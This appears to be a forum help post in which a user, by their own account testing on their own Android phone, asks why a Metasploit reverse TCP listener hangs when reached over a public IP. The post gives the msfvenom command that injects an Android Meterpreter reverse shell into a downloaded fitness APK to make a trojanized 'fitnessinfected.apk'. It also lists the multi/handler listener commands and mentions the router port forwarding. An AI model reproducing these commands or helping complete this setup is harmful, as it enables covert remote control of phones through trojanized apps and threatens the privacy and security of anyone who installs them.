Metasploit Reverse TCP Listener for Public IP Address

Apr 17, 2019 03:41 PM
636910870630947108.jpg

I already tried backdooring with internal ip address and it worked well. Now, Im trying to backdoor my android over the internet, so i gave my pc's public ip address as the lhost and 8080 as lport. I also did the port forwarding in my router config. The problem arises when i listen to the port through msfconsole, when i execute 'exploit' command, it gets stuck at 'Started Reverse TCP handler on 192.168.0.6:8080. Related screenshots have been uploaded. Please help me setup the listener. Please note that I have injected the payload into an apk I downloaded.

command used to inject the payload :

msfvenom -x fitness.apk -p android/meterpreter/reversetcp lhost=(my external ip) lport=8080 -o fitnessinfected.apk

commands executed after installation in android :

service postgresql start

msfconsole

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 192.168.0.6

set lport 8080

exploit

636910870630947108.jpg

port triggering configuration

636910870915322002.jpg

port forwarding/virtual server configuration

Comments

No Comments Exist

Be the first, drop a comment!